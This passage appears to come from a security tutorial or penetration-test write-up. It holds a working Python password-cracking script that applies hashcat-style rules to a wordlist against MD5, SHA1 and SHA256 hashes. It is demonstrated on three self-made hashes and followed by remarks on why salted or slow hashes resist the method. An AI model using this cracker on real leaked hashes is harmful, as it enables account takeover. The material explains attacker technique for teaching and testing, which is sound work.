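HASH_BY_HEX_LEN = {32: "md5", 40: "sha1", 64: "sha256"}   # hashcat modes 0, 100, 1400


def apply_rule(word, rule):
    """Apply a hashcat-style rule (subset: ':' noop, l, u, c, r, $X append, ^X prepend)."""
    i = 0
    while i < len(rule):
        op = rule[i]
        if op == ":":
            pass
        elif op == "l":
            word = word.lower()
        elif op == "u":
            word = word.upper()
        elif op == "c":
            word = word[:1].upper() + word[1:].lower()
        elif op == "r":
            word = word[::-1]
        elif op in "$^":
            i += 1
            if i >= len(rule):
                raise ValueError(f"rule {rule!r}: {op} needs a character")
            word = word + rule[i] if op == "$" else rule[i] + word
        else:
            raise ValueError(f"unsupported rule op {op!r} in {rule!r}")
        i += 1
    return word


def crack(hashes, wordlist, rules=(":",)):
    """Hash every candidate once and look it up in the set of targets.
    Returns {hash: plaintext} for recovered entries."""
    by_algo = {}
    for h in hashes:
        algo = HASH_BY_HEX_LEN.get(len(h))
        if algo is None:
            raise ValueError(f"cannot infer digest type from {h!r}")
        by_algo.setdefault(algo, set()).add(h.lower())
    found = {}
    for algo, wanted in by_algo.items():
        for word in wordlist:
            for rule in rules:
                cand = apply_rule(word, rule)
                digest = hashlib.new(algo, cand.encode(), usedforsecurity=False).hexdigest()
                if digest in wanted:
                    found[digest] = cand
    return found


def constructed_dump():
    """Stand-in for the recovered hash file. In a real test only the hex digests
    are known; the plaintexts here are chosen so that a rule is needed for each."""
    plain = {"md5": "Springfield1", "sha1": "widgetpro!", "sha256": "Acme2024"}
    return [hashlib.new(a, p.encode(), usedforsecurity=False).hexdigest()
            for a, p in plain.items()]


WORDLIST = ["springfield", "WidgetPro", "acme", "welcome"]   # e.g. CeWL output
RULES = (":", "c$1", "l$!", "c$2$0$2$4")                      # hashcat rule strings


if __name__ == "__main__":
    for digest, plaintext in crack(constructed_dump(), WORDLIST, RULES).items():
        print(f"{digest}:{plaintext}")
```

With the plain word list and no rules nothing is recovered; the same list with four rules recovers all three hashes, which is why a site-specific word list plus a rule set is usually tried before any brute-force mask. Salted or slow hashes (bcrypt, scrypt, Argon2) remove the "hash once, look up many" shortcut used here, and that is where the GPU advantage shrinks.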